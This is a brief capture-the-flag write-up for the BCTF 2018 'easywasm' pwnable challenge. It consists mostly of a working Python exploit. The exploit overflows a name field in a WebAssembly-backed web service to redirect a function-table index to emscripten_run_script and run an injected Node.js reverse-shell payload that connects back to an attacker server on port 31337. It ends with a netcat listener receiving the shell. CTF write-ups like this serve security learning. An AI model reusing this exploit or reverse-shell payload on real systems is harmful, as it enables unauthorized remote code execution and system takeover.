CTF/2018
BCTF 2018 - easywasm
pwn3r_45
2018. 12. 6. 20:40
Category : pwnable
Summary : wasm, bof, trigger function table index oob
Exploit
#!/usr/bin/python
from pwn import *
from paul45 import reverse_shell
import requests as r
URL = 'http://0:23333'
def add_person(name, is_tutor):
res = r.get(URL + '/add_person', params={'name':name, 'is_tutor':is_tutor}).text
idx = int(res[len('create person done, person id = '):])
return idx
def change_name(idx, new_name):
res = r.get(URL + '/change_name', params={'id':idx, 'name':new_name}).text
assert 'done' in res
return res
def intro(idx):
res = r.get(URL + '/intro', params={'id':idx}).text
return res
pay = reverse_shell('nodejs', ('myserver', 31337))
idx = add_person('pwn3r', 1)
change_name(idx, '//'.ljust(60, '.') + chr(0x5) + pay)
print intro(idx)
'''
(*Z_envZ_table).data[offset + 23] = (wasm_rt_elem_t){func_types[0], (wasm_rt_anyfunc_t)Z_envZ__emscripten_run_scriptZ_vi};
(*Z_envZ_table).data[offset + 24] = (wasm_rt_elem_t){func_types[0], (wasm_rt_anyfunc_t)(&_tutor_hello)};
(*Z_envZ_table).data[offset + 25] = (wasm_rt_elem_t){func_types[0], (wasm_rt_anyfunc_t)(&f25)};
'''$ python ex.py
intro sent to log window
-------------------------
$ nc -lv 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from X.X.X.X 62017 received!
id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)